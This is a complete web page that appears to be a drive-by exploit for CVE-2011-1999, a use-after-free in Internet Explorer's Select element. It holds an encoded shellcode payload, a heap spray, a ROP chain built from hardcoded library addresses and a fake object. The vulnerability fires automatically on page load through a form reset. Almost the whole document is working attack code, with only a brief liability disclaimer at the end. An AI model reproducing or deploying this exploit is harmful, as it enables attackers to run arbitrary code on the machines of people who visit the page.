
Internet Explorer Select Element RCE - CVE-2011-1999 ?


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" id="doctype1">
<html>
<head>
<script type="text/javascript">

function int_to_hex(dword)
{
// Render a 32-bit value as two UTF-16 code units in little-endian word
// order: the low word first, then the high word. The hex string is
// zero-padded to eight digits before it is split into the two words.
var hex = Number(dword).toString(16);
var padded = hex;
for (var missing = 8 - padded.length; missing > 0; missing--) padded = '0' + padded;
var lowWord = padded.slice(4, 12);
var highWord = padded.slice(0, 4);
return unescape('%u' + lowWord + '%u' + highWord);
}

spraybase = 0x0a0a0024;

var shellcode = unescape("%u9090%u9090%ucbb5%u7852%u9090%u9090%u11eb%u"+"4a5a%uc933%u8166%uE3c1%u8007%u0a34%ue296%uebfa%ue805%uffea%uffff%u7ef6%u9696%u9696%u17cb%u857b%ud686%u1d96%u1b63%uc310%ud683%uc696%ud67e%u9692%u1b96%ud010%ud683%uc696%ua27e%u9692%u1b96%u3010%ud683%uc696%ube7e%u9692%u1b96%u5910%ud683%uc696%u8a7e%u9692%uc096%u97fc%u3b7e%u9694%uc096%u94fc%u337e%u9694%uc096%u95fc%u0b7e%u9694%uc096%u92fc%u037e%u9694%uc096%uac7e%u9697%ufc96%u6996%ue800%ud683%uf796%uc355%u7a1d%u5215%u1d6a%u9ed3%ud31f%ua56a%ucf56%uaf16%ue296%ud692%u7dd7%u5f61%u9254%uc396%u7a1d%ue369%u7e9e%u694f%u6969%ud397%u1d9e%u9ae3%ueb1d%u699e%u9ae3%u5e7e%u6969%u1d69%u155e%u9757%u3265%u545f%u969e%u1dc3%uc17a%ueb1d%u139e%ue269%u1dbe%u9ac3%u4413%ub7e2%u1dc0%u86e3%u501d%u13d8%u1d56%ue059%ubd9a%ud041%u921c%u1e87%ud797%ue3d8%u1d61%uc851%u5fc9%u9a54%ua596%uc956%u545f%u969a%u1dc3%u1d7a%u9ee3%u101b%u8100%u96d6%u69c6%u1c00%ud683%ufc96%uc6f3%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u6252%ue31d%uf69e%ucb1b%uc56a%ud6fc%uf2fc%u101d%u83db%u96d6%u69c6%u1000%ud683%uf796%u101d%u83db%u96d6%ud31f%u1d62%u9350%u8709%u96d6%ud3bd%u1562%u937e%ud31f%uf66e%u97fc%u081b%u8193%u96d6%u1dc5%udb10%ud683%uc696%uc37e%u6969%uf769%ufcf6%u1b92%u6ed3%u1dc6%udb10%ud683%u1596%u9756%u7ec6%u69a8%u6969%u1bf7%ue810%ud683%ufc96%uc692%u092e%ud687%u9596%u1550%u9556%u7ec6%u69b2%u6969%u545f%u9692%u96fc%u962e%u9696%u6996%u5f46%u9254%uc396%u7a1d%u5215%u1d7a%u9ee3%u92fe%u9697%ufc96%u69d6%u1400%ud683%u1f96%u6ad3%ufec6%u9792%u9696%u0069%u83ec%u96d6%u1bf6%u1a08%ud681%uc596%ue369%u7e6a%u6821%u6969%u69f7%u6ae3%u0069%u83c8%u96d6%u96fc%u96fc%ue369%u1b6a%ub908%ud683%uc596%u96fc%u0069%u8340%u96d6%u569d%u1399%u9662%u9696%u96fc%u96fc%u95fc%u96fc%u95fc%u95fc%ue369%u696a%uf000%ud683%u1f96%u6ed3%ueb15%u966e%u1299%u9644%u9696%u96fc%ue369%u696e%uf400%ud683%u1f96%u62d3%ueb17%uf662%u967c%u9996%u2110%u9696%u1796%u62eb%uc906%u9697%u1599%u963c%u9696%ue369%ufc62%u69d6%u1400%ud683%u1f96%u66d3%ud351%u967a%u9696%ufc96%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u8
3f8%u96d6%u569d%ueae2%u1df6%u62db%ud31d%u1c66%u1686%ub254%u6416%u1e4a%ud686%ue3df%uf764%u96fc%u96fc%u96fc%ue369%u696e%u0000%ud683%u1596%u696e%uc4e2%u96fc%ud351%u967a%u9696%u1b96%u7ad3%u69c6%u62e3%ue369%u6966%u6ee3%u0069%u83e4%u96d6%u569d%ua4e2%ue369%u696e%ufc00%ud683%ufe96%u9146%u9696%u0069%u8304%u96d6%ue369%u696a%u1c00%ud683%u1596%u966e%u71e2%u081b%u8134%u96d6%uc6c5%u0069%u8318%u96d6%u4669%u545f%u9692%u1dc3%u157a%u4652%ue31d%ufe9a%u9792%u9696%ud6fc%u0069%u8314%u96d6%ud31f%u1b6a%u6ed3%ufec6%u968f%u9694%u96fc%ueb15%u979e%u90e3%u101b%u8348%u96d6%ueb15%u949e%u90e3%u101b%u8361%u96d6%ueb15%u959e%u90e3%u101b%u8081%u96d6%ueb15%u929e%u90e3%u101b%u80a9%u96d6%ufec6%u9694%u1696%u0069%u8339%u96d6%ueb15%u979e%u90e2%ueb15%u949e%u93e3%u1e7f%u9696%u1596%u9eeb%ue395%u9db4%ue356%ufc88%u1b96%uc108%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81e4%u96d6%u69c5%ue000%ud683%u1596%u9eeb%ue392%u9dc0%ue356%ufec4%u96a9%u9699%u96fc%u96fc%u0069%u832d%u96d6%u569d%ua9e2%ub2fc%u081b%u819a%u96d6%uc6c5%u0069%u8329%u96d6%u569d%ubde2%ucb1b%uc546%u97fc%u69c6%u5500%ud683%ufc96%u1b96%ub308%ud681%uc596%u0069%u83e0%u96d6%u96fc%u081b%u81a9%u96d6%u69c5%ue000%ud683%u5f96%u9e54%u9d96%ue256%u5f90%u9e54%u7d96%u15f2%u9eeb%ue397%u1b90%uce08%ud680%u1596%u9eeb%ue394%u1b90%u3a08%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u1596%u9eeb%ue397%u1b90%u0708%ud680%u1596%u9eeb%ue394%u1b90%u7208%ud680%uc596%u96fc%u97fc%u96fc%u0069%u830c%u96d6%u569d%u91e2%u69c6%u0800%ud683%u5f96%u9e54%uf696%ue21d%ub2b2%u017e%u9696%ufe96%u473b%ud7a2%u7ec6%u96b7%u9696%u69c0%u1d46%ubd4e%u3a56%u5612%u6de3%u681d%u133b%ue256%uc69c%u7ec5%u9691%u9696%u7d3d%uf767%u9254%uf696%ufa1d%ub2b2%ud31d%u1daa%ubec2%u95ee%u1d43%u8edc%ucc1d%u95b6%u754b%udfdf%ua21d%u951d%ua563%uf669%u401d%u56a5%u4661%u94a4%u9e25%u7e47%u93e5%ub6a3%u2e15%u687b%ue35d%u1665%u96ac%u95e2%u7dd4%u6171%u1f46%ub292%uadf7%ub2ea%ue3be%u1d5c%ub2cc%u4b95%u1df0%udd9a%ucc1d%u958a%u1d4b%u1d92%u5395%u947d%u56bd%ud21f%u8ab2%u54f7%u969e%ua5f6%uf256%ud61d%u13a6%uee56%u1d9
a%u9ad6%ue61d%u3b8a%ud61d%u7d9e%u1d9f%ua2d6%ud61b%u1dea%uaad6%ud21f%u8ab2%u55f7%ue2fe%ue6e2%ub9ac%u9bb9%uf4fe%ub8a1%uf8ff%uf8b9%ue5b9%uf3b8%uf3ee%ue396%uf3e5%ua5e4%u96a4%u2d94%uf3dd%u9696%u9696%uf3fd%uf8e4%ufaf3%ua4a5%u4896%ub3f9%u8d48%ueb17%u4979%u1fbb%u0b1a%uf4dc%uccfe%u4ef7%u05c2%ue1e1%ud9b7%ud3ba%u0bbe%ubc7f%u1745%u63e7%u55d6%u35c5%u2d15%u5542%u3bef%ua247%u89d7%u5fea%u2c69%u57a0%ud49c%u130b%uef13%ucf29%u3580%u8976%u9697%u9696%uf796%ue0f2%ue6f7%ua5ff%u96a4%uc00f%u5b8f%u9fad%u1e21%u9439%u128e%u3bfa%uddef%u68fc%ubaf7%u6960%u894c%uc391%u5288%u9696%u9696%ue4e3%ufbfa%uf8f9%u8f96%u5542%u9604%u9696%uc596%ud0d9%uc1c2%uc4d7%ucad3%ud7ca%uf8fe%uf7da%ucaf4%uc0ca%udaa5%ue2ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%ufed7%udaf8%uf4f7%ucaca%ua5c0%ua5b6%ua3a0%ud5b6%ufffa%ufff8%u96f5%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uded8%ub6d8%uf9d5%ue6e4%ue4f9%ue2f7%uf9ff%ucaf8%ud8ca%ue0f7%ue4f3%uf7c0%uf5f5%uf8ff%u96f3%ud9c5%uc2d0%ud7c1%ud3c4%ucaca%uc5d3%ue5c2%uf0f9%ucae2%ud7ca%ucfda%uf5f7%ud196%uf9fa%uf7f4%ucafa%ua5c0%udfda%ud3c2%uedc9%ua5d7%ua6d7%ud3af%ua4d3%ua7bb%ua7d4%ubbd3%ua6a2%ua1a0%ud4bb%ua4a4%ubbd2%ua4a6%uafa0%ua2a7%ud4a0%ua6a7%ua6a6%uc9eb%udad7%u96da%ufad1%uf4f9%ufaf7%uc0ca%udaa5%uc2df%uc9d3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%ud7ed%ud7a5%uafa6%ud3d3%ubba4%ud4a7%ud3a7%ua2bb%ua0a6%ubba1%ua4d4%ud2a4%ua6bb%ua0a4%ua7af%ua0a2%ua7d4%ua6a6%ueba6%ud7c9%udada%ud196%uf9fa%uf7f4%ucafa%ua5c0%ua0a5%uc9a3%udfd0%udfd8%udec5%ud3c9%ud3c0%uc2d8%u2e96%u9696%u9696%u9696%u067f%u0606%u0606%ud796%uda96%ucf96%uf796%uf596%uc996%uc696%ucc96%uc596%ue496%ue096%u9696%u9696%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%ucfd7%uf1d7%uf8f3%ub8e2%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%udad7%uf7cf%ub8f5%ueff7%u96f3%ue2f8%uf2e5%ubbb6%ub6f5%ub6e7%ue6bb%ub6f8%uc0d8%ud7d5%uf3f1%ue2f8%uf8b8%uf5e6%uf896%ue5e2%ub6f2%uf5bb%ue7b6%ubbb6%uf8e6%ud8b6%uf7e5%ue5e0%uf5e0%uf8b8%uf5e6%uc096%udac5%ueff7%uf2b8%ufafa%uc596%uf2fe%uf5f9%ue1e0%uf2b8%ufafa%uff96%ufff8%u96e2%uc5b2%uf3fe%ufafa%uf9d5%
uf3f2%uc2c9%uf3fe%uf8d3%ub2f2%u3a2e%u9691%uc696%u967e%u9696%u6996%u96b3%ud6b6%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u9696%u96");

var heapspray =
int_to_hex(0x785863F6)
+ int_to_hex(0x7854F203)
+ int_to_hex(0x7C7D1AD4)
+ int_to_hex(0x785863F6)
+ int_to_hex(0x78590ABC)
+ int_to_hex(spraybase)
+ int_to_hex(0x3000)
+ int_to_hex(0x40)
+ int_to_hex(spraybase)
+ int_to_hex(0x7854F203)
+ int_to_hex(0x0a0a0220)
+ int_to_hex(0x78590ABC)
+ '11'
;

heapspray += int_to_hex(spraybase + 0x1F8 +4);

while (heapspray.length < 0x1F8/2)
{
heapspray += 'AA';
}

heapspray += int_to_hex(0x63f0575b); // virtual function 63f0575b

heapspray += shellcode;

function build_block(s)
{
var endtag = unescape("AA");

var len = 0x10000 - (s.length *2 + endtag.length * 2);
var b = "11";
while(b.length < len) b += b;
var block = b.substring(0, len / 2);
block = s + block + endtag;

var bigblock = "";
for (var i=0; i < 8; i++) bigblock += block;
bigblock = bigblock.substring(0, (0x80000-0x28)/2);

return bigblock
}


bigblock = build_block(heapspray);
var blocks = new Array();
for(var i = 0; i < 2 * 200; i++)
blocks[i] = [bigblock].join("");

function exploit()
{
var fakeobj = int_to_hex(spraybase) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x63f01e13) +
int_to_hex(0x63F01100) +
int_to_hex(0x63f01ec4) +
int_to_hex(spraybase) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
unescape("%u0c0c%u3b3b") +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
int_to_hex(0x0c0c0c0c) +
unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c");

var formobj, selobj, optobj;
selobj = document.getElementById("select1");
formobj = selobj.form;

var loopcount = 2;
bigarray = new Array();
for (var i=0; i<loopcount; i++)
{
var imgarray = new Array();
for(var j = 0; j < 500; j++) {
imgarray.push(document.createElement("img"));
}

bigarray.push(imgarray);
}

for (var k=0; k<loopcount; k++)
{
for(var i=0;i<5;i++) {
optobj = document.createElement('option');
optobj.text = "test";
selobj.add(optobj);
}

selobj.innerText = "foo";

for(var i = 0; i < bigarray[k].length; i++) {
bigarray[k][i].title = fakeobj.substring(0, 0x38 / 2 - 1);
}
               
formobj.reset();
}
alert('s');
}

</script>
</head>

<body onload='exploit()'>
<form method="post">
   <select id="select1">
</select>
</form>
<object classid="vvv.dll#GenericControl">
</body>
</html>


##eromang


//The information contained within this publication is

//supplied "as-is" with no warranties or guarantees of fitness

//of use or otherwise. Neither Bot24, Inc nor Bradley Sean Susser accepts

//responsibility for any damage caused by the use or misuse of

//this information

